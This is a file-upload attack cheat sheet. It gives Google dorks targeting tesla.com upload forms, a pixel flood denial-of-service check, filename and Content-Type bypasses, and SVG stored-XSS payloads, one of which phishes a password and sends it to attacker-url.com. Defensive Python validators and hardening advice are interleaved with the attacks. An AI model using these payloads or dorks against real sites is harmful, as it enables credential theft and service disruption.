👑Find file Upload to RCE

Google dorks for finding file upload forms

site:*.tesla.com | site:*.tesla.org & intext:"choose file"
site:*.com inurl:"uploadform" 
site:*.com inurl:"uploadform" filetype:asp 

Check file Upload to RCE:


Check Upload to Stored-XSS:


Check upload for Pixel Flood Attack:

1- Download the image file from here.

2- Upload this image to the website you are testing on.

3- If the website's server times out, the server is vulnerable.
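A pixel flood file is small on disk but declares enormous dimensions in its header, so the damage happens when the server's decoder allocates the buffer. The defensive check is therefore to read the declared size from the header and enforce a pixel budget before any decoder touches the bytes. The code below is an added example, not code from the original page; the PNG/JPEG/GIF header parsing is standard, while the pixel budget and the sample headers are constructed for illustration.

```python
import struct

# Constructed policy limit (about 5000 x 5000); tune it to what the app really needs.
MAX_PIXELS = 25_000_000
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_dimensions(data: bytes):
    """Width/height from the PNG IHDR chunk, which always follows the 8-byte signature."""
    if not data.startswith(PNG_SIG) or len(data) < 24 or data[12:16] != b"IHDR":
        return None
    return struct.unpack(">II", data[16:24])  # (width, height), big-endian


def jpeg_dimensions(data: bytes):
    """Walk JPEG marker segments until a SOFn frame header and read its height/width."""
    if data[:2] != b"\xff\xd8":
        return None
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xFF:                      # padding byte before a marker
            i += 1
            continue
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            i += 2                              # stand-alone markers carry no length
            continue
        seg_len = struct.unpack(">H", data[i + 2:i + 4])[0]
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
            if i + 9 > len(data):
                return None
            height, width = struct.unpack(">HH", data[i + 5:i + 9])
            return width, height
        i += 2 + seg_len
    return None


def gif_dimensions(data: bytes):
    """Logical screen width/height from the GIF header, little-endian."""
    if data[:6] not in (b"GIF87a", b"GIF89a") or len(data) < 10:
        return None
    return struct.unpack("<HH", data[6:10])


def declared_dimensions(data: bytes):
    for probe in (png_dimensions, jpeg_dimensions, gif_dimensions):
        dims = probe(data)
        if dims is not None:
            return dims
    return None


def check_image_upload(data: bytes, max_pixels: int = MAX_PIXELS):
    """Accept only when the header's declared size is within budget. Runs before any decoder."""
    dims = declared_dimensions(data)
    if dims is None:
        return False, "reject: unrecognised or truncated image header"
    width, height = dims
    if width == 0 or height == 0:
        return False, "reject: zero-sized image"
    if width * height > max_pixels:
        return False, f"reject: declared {width}x{height} exceeds {max_pixels} pixel budget"
    return True, f"accept: {width}x{height}"


# --- constructed sample headers (not real uploads) ---
def fake_png_header(width, height):
    ihdr = struct.pack(">II", width, height) + b"\x08\x02\x00\x00\x00"
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + ihdr + b"\x00\x00\x00\x00"

SMALL_PNG = fake_png_header(64, 64)
FLOOD_PNG = fake_png_header(0xFFFF, 0xFFFF)          # a few bytes on disk, ~4 Gpx if decoded
FLOOD_JPEG = (b"\xff\xd8"
              + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x00" * 9
              + b"\xff\xc0" + struct.pack(">H", 17) + b"\x08"
              + struct.pack(">HH", 30000, 40000) + b"\x03" + b"\x00" * 9)

if __name__ == "__main__":
    for label, blob in (("small png", SMALL_PNG), ("flood png", FLOOD_PNG), ("flood jpeg", FLOOD_JPEG)):
        print(label, check_image_upload(blob))
```

If the application decodes with Pillow, the same idea is built in: `Image.MAX_IMAGE_PIXELS` makes `Image.open()` raise `DecompressionBombError` for oversized declared sizes, and the decode itself should additionally run under a CPU and memory limit in a worker process so a single upload cannot stall the web tier.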


File Upload to Stored-XSS:

SVG file payload

Filename bypass: "Fileupload.svg.png"

Change Content-Type: image/svg+xml

SVG file payload uploaded here:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009901" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>

Taking it to credential theft by modifying the above payload to:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script>
    var passwd = prompt("Enter your password to continue");
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://attacker-url.com/log.php?password=" + encodeURI(passwd));
    xhr.send();
  </script>
</svg>
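Both bypasses in this section (the double extension "Fileupload.svg.png" and the client-chosen Content-Type: image/svg+xml) work only against validators that trust the filename or the request header. The server-side check below decides from the file body instead: it allow-lists extensions, refuses names with more than one extension, verifies magic bytes, and, when the body turns out to be SVG, records which script-capable constructs it carries for detection logging. This is an added example, not code from the original page; the allow-list, the magic-byte table and the sample inputs are constructed, and the sample SVG mirrors the shape of the proof-of-concept above.

```python
import xml.etree.ElementTree as ET

# Constructed allow-list: SVG is deliberately absent because it is XML with script capability.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}


def extension_of(filename: str):
    """Single, lower-cased extension; None for no extension or a double one like 'x.svg.png'."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return None
    return parts[1]


def localname(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on namespaced tags and attributes."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes):
    """None if the body is not well-formed SVG; otherwise the list of script-capable
    constructs found (an empty list means an inert SVG)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return None
    if localname(root.tag) != "svg":
        return None
    findings = []
    for el in root.iter():
        tag = localname(el.tag)
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            a = localname(attr)
            if a.startswith("on"):
                findings.append(f"{a} handler on <{tag}>")
            elif a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: href on <{tag}>")
    return findings


def validate_upload(filename: str, content_type: str, data: bytes):
    """Decide from the body, not from the name or the client-supplied Content-Type."""
    ext = extension_of(filename)
    if ext is None:
        return False, "reject: missing or multiple extensions"
    if ext not in ALLOWED_EXT:
        return False, f"reject: .{ext} not in allow-list"
    if data.startswith(MAGIC[ext]):
        return True, f"accept: .{ext} (client said {content_type}, ignored)"
    findings = svg_active_content(data)
    if findings is None:
        return False, f"reject: body is not a {ext} image"
    detail = ", ".join(findings) or "no active content"
    return False, f"reject: SVG body behind .{ext} ({detail})"


# Constructed sample inputs; the SVG mirrors the page's proof-of-concept shape.
SVG_POC = (b'<?xml version="1.0"?>'
           b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
           b'<script type="text/javascript">alert(document.cookie);</script></svg>')
INERT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
TINY_PNG = MAGIC["png"] + b"\x00" * 16   # header only; enough for the magic-byte check

if __name__ == "__main__":
    print(validate_upload("Fileupload.svg.png", "image/svg+xml", SVG_POC))
    print(validate_upload("avatar.png", "image/png", SVG_POC))
    print(validate_upload("avatar.png", "image/png", TINY_PNG))
```

Validation at upload time is only half of the control: whatever is accepted should be served from a separate origin (so a stored script cannot read the application's cookies), with `X-Content-Type-Options: nosniff` and, for anything not meant to render inline, `Content-Disposition: attachment`. The findings list from `svg_active_content` is what to write to the application log, since an upload carrying a `<script>` element behind a `.png` name is a high-confidence signal of probing.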
